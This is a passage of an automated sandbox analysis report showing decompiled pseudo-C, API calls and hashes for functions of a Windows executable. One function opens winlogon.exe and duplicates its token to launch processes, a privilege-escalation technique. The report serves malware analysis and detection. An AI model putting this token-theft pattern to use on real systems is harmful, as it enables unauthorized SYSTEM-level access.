                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 16%
                                                                                                                			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                0x0040adf6
                                                                                                                0x0040adf8
                                                                                                                0x0040adfa
                                                                                                                0x0040adfb
                                                                                                                0x0040adfb
                                                                                                                0x0040ae02
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040ae04
                                                                                                                0x0040ae05
                                                                                                                0x0040ae6d
                                                                                                                0x0040ae6e
                                                                                                                0x0040ae73
                                                                                                                0x0040ae76
                                                                                                                0x0040ae7f
                                                                                                                0x0040ae83
                                                                                                                0x0040ae86
                                                                                                                0x00000000
                                                                                                                0x0040ae86
                                                                                                                0x0040ae8f
                                                                                                                0x0040ae0c
                                                                                                                0x0040ae10
                                                                                                                0x0040ae1e
                                                                                                                0x0040ae3b
                                                                                                                0x0040ae4a
                                                                                                                0x0040ae65
                                                                                                                0x0040ae7a
                                                                                                                0x0040ae7e
                                                                                                                0x0040ae67
                                                                                                                0x0040ae67
                                                                                                                0x0040ae68
                                                                                                                0x00000000
                                                                                                                0x0040ae68
                                                                                                                0x0040ae4c
                                                                                                                0x0040ae4c
                                                                                                                0x0040ae4e
                                                                                                                0x00000000
                                                                                                                0x0040ae4e
                                                                                                                0x0040ae3d
                                                                                                                0x0040ae3d
                                                                                                                0x0040ae3f
                                                                                                                0x0040ae53
                                                                                                                0x0040ae54
                                                                                                                0x0040ae59
                                                                                                                0x0040ae5c
                                                                                                                0x0040ae5c
                                                                                                                0x0040ae20
                                                                                                                0x0040ae28
                                                                                                                0x0040ae2d
                                                                                                                0x0040ae30
                                                                                                                0x0040ae30
                                                                                                                0x0040ae12
                                                                                                                0x0040ae12
                                                                                                                0x0040ae13
                                                                                                                0x00000000
                                                                                                                0x0040ae13
                                                                                                                0x00000000
                                                                                                                0x0040ae10

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                                                0x004041f9
                                                                                                                0x00404205
                                                                                                                0x00404208
                                                                                                                0x00404217
                                                                                                                0x0040421e
                                                                                                                0x00404236
                                                                                                                0x0040423f
                                                                                                                0x0040424a
                                                                                                                0x0040425f
                                                                                                                0x0040426b
                                                                                                                0x0040426e
                                                                                                                0x0040426e
                                                                                                                0x00404275
                                                                                                                0x004043be
                                                                                                                0x004043ce
                                                                                                                0x004043d0
                                                                                                                0x004043d3
                                                                                                                0x004043da
                                                                                                                0x004043da
                                                                                                                0x004043c0
                                                                                                                0x004043c3
                                                                                                                0x004043c3
                                                                                                                0x0040427b
                                                                                                                0x0040428c
                                                                                                                0x0040428f
                                                                                                                0x00404295
                                                                                                                0x004042a5
                                                                                                                0x004042b8
                                                                                                                0x004042cb
                                                                                                                0x004042de
                                                                                                                0x004042f1
                                                                                                                0x00404304
                                                                                                                0x00404317
                                                                                                                0x0040432a
                                                                                                                0x0040433d
                                                                                                                0x00404350
                                                                                                                0x00404363
                                                                                                                0x00404376
                                                                                                                0x00404389
                                                                                                                0x0040439c
                                                                                                                0x004043a4
                                                                                                                0x004043af
                                                                                                                0x004043b5
                                                                                                                0x004043b5
                                                                                                                0x004043f5

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040421E
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2142561256-3993045852
                                                                                                                • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                                0x00405b81
                                                                                                                0x00405b88
                                                                                                                0x00405b8a
                                                                                                                0x00405b8a
                                                                                                                0x00405b8f
                                                                                                                0x00405b96
                                                                                                                0x00405b9b
                                                                                                                0x00405bad
                                                                                                                0x00405bad
                                                                                                                0x00405b9d
                                                                                                                0x00405b9d
                                                                                                                0x00405ba8
                                                                                                                0x00405bab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405bab
                                                                                                                0x00405be9
                                                                                                                0x00405be9
                                                                                                                0x00405baf
                                                                                                                0x00405bb1
                                                                                                                0x00405ce2
                                                                                                                0x00405ce2
                                                                                                                0x00405bb7
                                                                                                                0x00405bbd
                                                                                                                0x00405bf6
                                                                                                                0x00405c4b
                                                                                                                0x00405c4c
                                                                                                                0x00405c52
                                                                                                                0x00405c53
                                                                                                                0x00000000
                                                                                                                0x00405bf8
                                                                                                                0x00405c02
                                                                                                                0x00405c0e
                                                                                                                0x00405c13
                                                                                                                0x00405c18
                                                                                                                0x00405c2c
                                                                                                                0x00405c2e
                                                                                                                0x00405c3b
                                                                                                                0x00405c3c
                                                                                                                0x00405c42
                                                                                                                0x00000000
                                                                                                                0x00405c1a
                                                                                                                0x00405c25
                                                                                                                0x00405c2a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405c2a
                                                                                                                0x00405c18
                                                                                                                0x00405bbf
                                                                                                                0x00405bc0
                                                                                                                0x00405bcd
                                                                                                                0x00405bce
                                                                                                                0x00405bd7
                                                                                                                0x00405c58
                                                                                                                0x00405c5f
                                                                                                                0x00405c61
                                                                                                                0x00405c61
                                                                                                                0x00405c63
                                                                                                                0x00405cdb
                                                                                                                0x00405cdb
                                                                                                                0x00405c65
                                                                                                                0x00405c65
                                                                                                                0x00405c74
                                                                                                                0x00000000
                                                                                                                0x00405c84
                                                                                                                0x00405c8a
                                                                                                                0x00405c8d
                                                                                                                0x00405c99
                                                                                                                0x00405caf
                                                                                                                0x00405cbd
                                                                                                                0x00405cc8
                                                                                                                0x00405cd4
                                                                                                                0x00405cd9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405cd9
                                                                                                                0x00405c74
                                                                                                                0x00405c63
                                                                                                                0x00405ce6

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                • wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                  • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                • wcslen.MSVCRT ref: 00405C20
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                • memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                • String ID: strings
                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                0x00401e59
                                                                                                                0x00401e5c
                                                                                                                0x00401e64
                                                                                                                0x00401e67
                                                                                                                0x00401ef9
                                                                                                                0x00401e6d
                                                                                                                0x00401e70
                                                                                                                0x00401e76
                                                                                                                0x00401e79
                                                                                                                0x00401e7e
                                                                                                                0x00401e83
                                                                                                                0x00401e92
                                                                                                                0x00401e85
                                                                                                                0x00401e8e
                                                                                                                0x00401e8e
                                                                                                                0x00401e96
                                                                                                                0x00401ee6
                                                                                                                0x00401e98
                                                                                                                0x00401e9b
                                                                                                                0x00401e9e
                                                                                                                0x00401ea3
                                                                                                                0x00401ea8
                                                                                                                0x00401ebb
                                                                                                                0x00401eaa
                                                                                                                0x00401eb7
                                                                                                                0x00401eb7
                                                                                                                0x00401ebf
                                                                                                                0x00401ed3
                                                                                                                0x00401ec1
                                                                                                                0x00401ec7
                                                                                                                0x00401ec9
                                                                                                                0x00401ec9
                                                                                                                0x00401ed8
                                                                                                                0x00401ed8
                                                                                                                0x00401eeb
                                                                                                                0x00401eeb
                                                                                                                0x00401f01

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                  • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                • String ID: winlogon.exe
                                                                                                                • API String ID: 1315556178-961692650
                                                                                                                • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                0x00405241
                                                                                                                0x00405250
                                                                                                                0x00405257
                                                                                                                0x0040525f
                                                                                                                0x00405262
                                                                                                                0x00405265
                                                                                                                0x00405268
                                                                                                                0x0040526f
                                                                                                                0x0040526f
                                                                                                                0x00405277
                                                                                                                0x00405277
                                                                                                                0x0040527a
                                                                                                                0x0040527f
                                                                                                                0x00405284
                                                                                                                0x00405285
                                                                                                                0x00405291
                                                                                                                0x00405296
                                                                                                                0x004052a9
                                                                                                                0x004052b3
                                                                                                                0x004052b7
                                                                                                                0x004052bc
                                                                                                                0x004052ca
                                                                                                                0x004052d2
                                                                                                                0x004052d5
                                                                                                                0x004052d8
                                                                                                                0x004052d8
                                                                                                                0x004052db
                                                                                                                0x004052db
                                                                                                                0x004052e1
                                                                                                                0x004052e4
                                                                                                                0x004052e8
                                                                                                                0x004052f2

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3979103747-1363028141
                                                                                                                • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                0x00406157
                                                                                                                0x0040616d
                                                                                                                0x00406174
                                                                                                                0x0040617f
                                                                                                                0x00406185
                                                                                                                0x00406196
                                                                                                                0x0040619e
                                                                                                                0x004061b6
                                                                                                                0x004061bd
                                                                                                                0x004061d4
                                                                                                                0x004061da
                                                                                                                0x004061e0
                                                                                                                0x004061e5
                                                                                                                0x004061e6
                                                                                                                0x004061ef
                                                                                                                0x004061f9
                                                                                                                0x004061ff
                                                                                                                0x004061ef
                                                                                                                0x00406206

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                • API String ID: 1028950076-4169760276
